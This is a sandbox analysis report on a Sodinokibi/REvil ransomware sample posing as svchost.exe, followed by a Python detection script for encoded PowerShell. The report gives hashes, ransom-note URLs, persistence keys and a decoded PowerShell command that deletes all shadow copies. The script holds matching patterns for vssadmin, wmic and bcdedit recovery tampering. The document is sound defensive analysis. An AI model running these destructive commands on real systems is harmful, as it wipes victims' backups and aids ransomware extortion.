Analysis

  max time kernel:   144s
  max time network:  145s
  platform:          windows10_x64
  resource:          win10v200430
  submitted:         11-06-2020 16:15
Static task
  static1

Behavioral task
  behavioral1
    Sample:    svchost.exe
    Resource:  win7v200430

Behavioral task
  behavioral2
    Sample:    svchost.exe
    Resource:  win10v200430
General

  Target:  svchost.exe
  Size:    166KB
  MD5:     cfd0e9822b75398979cf876a752ef248
  SHA1:    2ed7e7697375b73dd10a62934a3d29192a993f4e
  SHA256:  6361413fd0b01dd9bee8c2d942c78a0550eff7292c2ec5bd5bc840413fea1d7e
  SHA512:  f0d9a9b2dcbbfb832337672769d4ee1814f3034fab9775c02ad752e949c1ca8dddb45586ef635389328d8c9597b036948ff6b6b3c8a7886b4fb7058d0546762a
Malware Config

Extracted
  Path:    C:\ynzi30-readme.txt
  Family:  sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A53D520FEDDA4258
    http://decryptor.cc/A53D520FEDDA4258
Signatures

Adds Run entry to start application (2 TTPs, 2 IoCs)
  Process: svchost.exe
    description      ioc
    Key created      \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
    Set value (str)  \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\oXnEn2JlQT = "C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe"
Modifies service (2 TTPs, 5 IoCs)
  Process: vssvc.exe
    description  ioc
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
    Key created  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
Suspicious use of WriteProcessMemory (2 IoCs)
  Process: svchost.exe
    description                      pid   process      target process
    PID 3748 wrote to memory of 428  3748  svchost.exe  powershell.exe
    PID 3748 wrote to memory of 428  3748  svchost.exe  powershell.exe
Enumerates connected drives (3 TTPs)
Drops file in Program Files directory (19 IoCs)
  Process: svchost.exe
    description                   ioc
    File opened for modification  \??\c:\program files\LockRedo.kix
    File opened for modification  \??\c:\program files\WaitExit.MTS
    File created                  \??\c:\program files\ynzi30-readme.txt
    File opened for modification  \??\c:\program files\CompressGet.wps
    File opened for modification  \??\c:\program files\SetPush.ex_
    File opened for modification  \??\c:\program files\SyncConvert.dotm
    File opened for modification  \??\c:\program files\UnprotectDismount.crw
    File created                  \??\c:\program files (x86)\ynzi30-readme.txt
    File opened for modification  \??\c:\program files\SearchReceive.tiff
    File opened for modification  \??\c:\program files\SuspendRead.rtf
    File opened for modification  \??\c:\program files\SwitchOptimize.wm
    File opened for modification  \??\c:\program files\UnlockGet.mpe
    File opened for modification  \??\c:\program files\MeasureSearch.pdf
    File opened for modification  \??\c:\program files\RepairRead.nfo
    File opened for modification  \??\c:\program files\SplitMerge.ini
    File opened for modification  \??\c:\program files\SubmitResolve.dotx
    File opened for modification  \??\c:\program files\UpdateConnect.odt
    File opened for modification  \??\c:\program files\WaitJoin.xls
    File opened for modification  \??\c:\program files\ConvertFromBackup.pps
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  Process: svchost.exe
    description      ioc
    Set value (str)  \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\u42p2.bmp"
Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious use of AdjustPrivilegeToken (6 IoCs)
  Processes: svchost.exe, powershell.exe, vssvc.exe
    description                      pid   process
    Token: SeDebugPrivilege          3748  svchost.exe
    Token: SeDebugPrivilege          428   powershell.exe
    Token: SeBackupPrivilege         1692  vssvc.exe
    Token: SeRestorePrivilege        1692  vssvc.exe
    Token: SeAuditPrivilege          1692  vssvc.exe
    Token: SeTakeOwnershipPrivilege  3748  svchost.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: svchost.exe, powershell.exe
    pid   process
    3748  svchost.exe
    3748  svchost.exe
    428   powershell.exe
    428   powershell.exe
    428   powershell.exe
Processes

  C:\Users\Admin\AppData\Local\Temp\svchost.exe
    Command line:  "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
    PID:           3748
    Signatures:
      - Adds Run entry to start application
      - Suspicious use of WriteProcessMemory
      - Drops file in Program Files directory
      - Sets desktop wallpaper using registry
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (child of PID 3748)
      Command line:  powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Decoded (-e is base64 of UTF-16LE):  Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      PID:           428
      Signatures:
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious behavior: EnumeratesProcesses

  C:\Windows\system32\wbem\unsecapp.exe
    Command line:  C:\Windows\system32\wbem\unsecapp.exe -Embedding
    PID:           576

  C:\Windows\system32\vssvc.exe
    Command line:  C:\Windows\system32\vssvc.exe
    PID:           1692
    Signatures:
      - Modifies service
      - Suspicious use of AdjustPrivilegeToken

Note: the WMI shadow-copy deletion issued by PID 428 is what causes vssvc.exe (PID 1692) to start and enable SeBackupPrivilege/SeRestorePrivilege; unsecapp.exe is the WMI client callback sink that WMI spins up for the PowerShell caller. The parent svchost.exe is the sample itself, running from %TEMP% rather than System32, and the Run-key value oXnEn2JlQT points back at that same path.
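The process tree above is the part of this report a detection engineer reuses: a process named svchost.exe outside System32 spawning powershell.exe with an -e argument that decodes to a Win32_Shadowcopy deletion. The following Python is an added example, not code from the sandbox or from the sample: it extracts the -EncodedCommand payload from a process-creation command line, decodes it (base64 of UTF-16LE, the encoding PowerShell uses for -e), and matches it against shadow-copy tampering patterns. The Win32_Shadowcopy/.Delete() pattern is the one this report shows; the vssadmin, wmic and bcdedit patterns and the masquerading-svchost check are generalisations added here, not observed in this run. The two events in SAMPLE_EVENTS are constructed, the first copied from the tree above and the second a benign control.

```python
"""Triage of encoded PowerShell launched from a suspicious parent (added example)."""
import base64
import binascii
import re
from typing import Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -en, -enc, ...) and -ec.
_ENCODED_FLAGS = {"encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)} | {"ec"}
# A flag (-x or /x) followed by a token made only of base64-alphabet characters.
_FLAG_RE = re.compile(r"(?:^|\s)[-/](\w+)\s+([A-Za-z0-9+/=]+)")

# Recovery-tampering indicators. The WMI form is the one in the report above; the
# vssadmin, wmic and bcdedit forms are added here to cover other common variants.
_INDICATORS = {
    "shadow_copy_delete_wmi": re.compile(r"Win32_Shadowcopy.*\.Delete\s*\(", re.I | re.S),
    "shadow_copy_delete_vssadmin": re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    "shadow_copy_delete_wmic": re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
    "recovery_disabled_bcdedit": re.compile(r"bcdedit(?:\.exe)?\s+.*recoveryenabled\s+no", re.I),
}


def extract_encoded_argument(cmdline: str) -> Optional[str]:
    """Return the base64 payload following an -e/-enc/-EncodedCommand flag, or None."""
    for flag, value in _FLAG_RE.findall(cmdline):
        if flag.lower() in _ENCODED_FLAGS:
            return value
    return None


def decode_encoded_command(payload: str) -> Optional[str]:
    """Decode a -EncodedCommand payload: base64 wrapping UTF-16LE. None if malformed."""
    try:
        raw = base64.b64decode(payload, validate=True)
        return raw.decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def triage(parent_image: str, cmdline: str) -> dict:
    """Score one process-creation event and return the decoded script plus findings."""
    findings = []
    parent = parent_image.lower().replace("/", "\\")
    # svchost.exe that is not the real one under System32/SysWOW64 is masquerading
    # (the sample in this report ran from %TEMP%). Check added here, not from the report.
    if parent.endswith("\\svchost.exe") and not (
        "\\windows\\system32\\" in parent or "\\windows\\syswow64\\" in parent
    ):
        findings.append("masquerading_svchost_parent")

    decoded = None
    payload = extract_encoded_argument(cmdline)
    if payload is not None:
        findings.append("encoded_powershell")
        decoded = decode_encoded_command(payload)
        if decoded is None:
            findings.append("undecodable_encoded_argument")

    # Match indicators against the decoded script when there is one, else the raw line.
    script = decoded if decoded is not None else cmdline
    for name, pattern in _INDICATORS.items():
        if pattern.search(script):
            findings.append(name)
    return {"decoded": decoded, "findings": findings}


# Constructed sample events: the first mirrors the report's process tree, the second is benign.
SAMPLE_EVENTS = [
    {
        "parent_image": r"C:\Users\Admin\AppData\Local\Temp\svchost.exe",
        "cmdline": "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3"
                   "AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABl"
                   "AHQAZQAoACkAOwB9AA==",
    },
    {
        "parent_image": r"C:\Windows\System32\svchost.exe",
        "cmdline": "powershell.exe -NoProfile -Command Get-Date",
    },
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(event["parent_image"])
        print("  ", triage(event["parent_image"], event["cmdline"]))
```

Matching on the decoded script rather than the raw command line is the point: the base64 in the tree above contains none of the strings a naive rule would look for, so any rule keyed on "Shadowcopy" or "vssadmin" in the command line alone misses it. The malformed-payload branch matters too; attackers sometimes pad or mangle the encoded argument so that a decoder crashes while PowerShell itself still runs it.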